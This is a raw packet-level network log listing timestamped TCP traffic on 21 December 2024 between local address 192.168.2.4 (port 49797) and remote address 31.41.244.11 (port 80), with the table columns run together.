                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.930895090 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.930941105 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.931070089 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.932045937 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.932085037 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.932121992 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.932157040 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.933084011 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.933130980 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.933212996 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.933320045 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.934298992 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.934344053 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.934473038 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.934514999 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.935451984 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.935492992 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.935575962 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.935616016 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.936641932 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.936682940 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.936719894 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.936768055 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.937856913 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.937902927 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.938050985 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.938113928 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.938992977 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.939034939 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.939136028 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.939192057 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.940146923 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.940296888 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.940346003 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.941375017 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.941415071 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.941483021 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.941519976 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.942739964 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.942795038 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.942845106 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.943070889 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.943698883 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.943742990 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.943823099 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.943918943 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.944926977 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.944964886 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.945035934 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.945072889 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.946023941 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.946130037 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.946191072 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.946229935 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.947227955 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.947267056 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.947336912 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.947384119 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.948409081 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.948507071 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.948537111 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.948591948 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.949702024 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.949747086 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.949835062 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.949873924 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.950771093 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.950812101 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.950896025 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.950936079 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.951939106 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.951978922 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.952114105 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.952152967 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.953157902 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.953200102 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.953244925 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.953283072 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.954277992 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.954324007 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.954401970 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.954442024 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.955449104 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.955488920 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.955584049 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.955619097 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.956711054 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.956754923 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.956809998 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.956902981 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.957827091 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.957875013 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.957936049 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.957998037 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.959017992 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.959060907 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.959135056 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.959175110 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.960206032 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.960252047 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.960324049 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.960362911 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.961358070 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.961401939 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.961687088 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.961724997 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.962508917 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.962553024 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.962635040 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.962673903 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.963690996 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.963745117 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.963814020 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.963850021 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.964914083 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.964955091 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.964997053 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.965035915 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.965993881 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.966042042 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.096534967 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.096582890 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.096657991 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.096735001 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.096981049 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.097028971 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.097177029 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.097215891 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.098145008 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.098263979 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.098263979 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.098301888 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.099340916 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.099394083 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.099458933 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.099499941 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.100488901 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.100580931 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.100625038 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.100665092 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.101695061 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.101737976 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.101777077 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.101818085 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.102864027 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.102904081 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.102972984 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.103035927 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.104038000 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.104094028 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.104162931 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.104204893 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.105266094 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.105314016 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.105423927 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.105556965 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.106359005 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.106411934 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.106498003 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.106544971 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.107599020 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.107722998 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.107764959 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.108773947 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.108861923 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.108905077 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.109919071 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.110044956 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.110054970 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.110095024 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.111103058 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.111149073 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.111229897 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.111291885 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.112256050 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.112325907 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.112385988 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.112445116 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.113434076 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.113491058 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.113548994 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.113729000 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.114604950 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.114675045 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.114722967 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.114804029 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.115787029 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.115855932 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.115966082 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.116054058 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.117038965 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.117084980 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.117219925 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.118124962 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.118238926 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.118287086 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.118288040 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.118340969 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.119369984 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.119455099 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.119501114 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.120507956 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.120600939 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.120630980 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.120671988 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.121736050 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.121853113 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.121895075 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.122860909 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.122901917 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.122955084 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.122994900 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.124072075 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.124114990 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.124311924 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.124363899 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.125217915 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.125258923 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.125339031 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.125514984 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.126391888 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.126441956 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.126578093 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.126626968 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.127573013 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.127618074 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.127701044 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.127749920 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.128794909 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.128851891 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.128879070 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.128918886 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.129913092 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.129954100 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.130110979 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.130150080 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.131149054 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.131189108 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.131246090 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.131289959 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.132288933 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.132345915 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.132415056 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.132453918 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.133469105 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.133518934 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.133595943 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.134624958 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.134675026 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.134749889 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.134790897 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.135847092 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.135893106 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.135951996 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.136027098 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.137121916 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.137162924 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.137288094 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.137331963 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.138190031 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.138230085 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.138281107 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.138381958 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.139410019 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.139450073 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.139475107 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.139513969 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.140532017 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.140674114 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.140717983 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.141733885 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.141809940 CET4979780192.168.2.431.41.244.11
